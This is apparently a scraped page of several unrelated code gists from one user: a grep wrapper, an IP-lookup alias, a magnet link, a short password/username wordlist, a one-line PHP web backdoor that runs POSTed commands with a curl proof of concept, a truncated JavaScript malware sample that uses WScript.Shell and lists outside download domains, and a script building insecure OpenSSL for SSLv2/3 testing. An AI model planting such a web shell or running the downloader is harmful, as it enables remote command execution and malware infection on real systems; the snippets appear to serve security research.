This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # jgrep: Comando para inverter a sintaxe do grep, recebendo o arquivo antes do termo de busca. | |
| jgrep() { | |
| grep "$2" "$1" | |
| } |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| magnet:?xt=urn:btih:4e3915a8ecf6bc174687533d93975b1ff0bde38a |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| alias meuip='dig +short txt ch whoami.cloudflare @1.0.0.1' |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| .log | |
| 0 | |
| 1 | |
| 1234 | |
| 12345 | |
| 123456 | |
| 18Renmeng | |
| 2 | |
| ACrenshaw | |
| AGorg |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <? | |
| /* | |
| @jcesarstef | |
| https://www.php.net/manual/en/language.operators.execution.php | |
| PoC: | |
| php -S 127.0.0.1:8081 | |
| curl 'http://127.0.0.1:8081/phpbackdoor1.php' --data 'q=whoami' | |
| */ | |
| $a = $_POST['q']; echo `$a`; |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // Source: https://github.com/HynekPetrak/javascript-malware-collection/blob/master/2015/20150814/20150814_4a28a7fe949b6e449bc8d595ca196417.js | |
| var stroke = "5557545E0D0A020B24060108130B0B000A1D4A070B09"; | |
| var x = ''; | |
| var vi = ''; | |
| function dl(fr) { | |
| var b = "idsecurednow.com laterrazzafiorita.it ihaveavoice2.com".split(" "); | |
| for (var i = 0; i < b.length; i++) { | |
| var ws = new ActiveXObject("WScript.Shell"); |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| # Get insecure OpenSSL 1.0.2 version from https://openssl.org/source/ | |
| # v1.1.0 seems to have removed SSLv2/3 support | |
| openssl_version=1.0.2k | |
| # Build OpenSSL | |
| wget https://openssl.org/source/openssl-$openssl_version.tar.gz | |
| tar -xvf openssl-$openssl_version.tar.gz | |
| cd openssl-$openssl_version |